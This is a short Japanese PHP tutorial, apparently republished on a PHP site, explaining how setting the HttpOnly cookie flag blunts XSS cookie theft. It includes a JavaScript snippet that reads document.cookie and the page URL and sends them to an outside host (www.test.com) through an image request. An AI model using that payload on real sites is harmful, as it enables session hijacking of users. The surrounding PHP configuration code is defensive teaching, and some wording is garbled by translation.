ホームページ >バックエンド開発 >PHPチュートリアル >xss 防御 php は httponly を使用して xss 攻撃を防止します_PHP チュートリアル

xss 防御 php は httponly を使用して xss 攻撃を防止します_PHP チュートリアル

WBOY
WBOYオリジナル
2016-07-13 10:35:251007ブラウズ

ハイジャックの概念は言うまでもなく、機密情報(ID情報、管理者情報)などが大量に含まれていれば終わりです。 。 。

Cookie情報の取得には以下のjsを使用します:

コードをコピーします コードは次のとおりです:

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http ://www .test.com/c.php?c='+cookie+'&u='+url;

通常、Cookie はドキュメント オブジェクトから取得されます。ブラウザが Cookie を設定する場合、ドメインなどの他のパラメータと同様に、HttpOnly というパラメータを受け入れるようになります。クッキーを見てください。

PHP 設定 HttpOnly:

コードをコピーします コードは次のとおりです:

//php.iniでは、session.cookie_httponly = グローバルCookie HttpOnly属性を有効にします
ini_set("session.cookie_httponly", 1);

/ /または setcookie() の 7 番目のパラメータを true に設定します
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

PHP5.1 パスより前の PHP バージョンの場合:

コードをコピーします コードは次のとおりです:

header("Set-Cookie: hidden=value; httpOnly");

最後に、HttpOnly は万能薬ではありません。

www.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/744327.html技術記事言うまでもなく、
のコンセプト
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。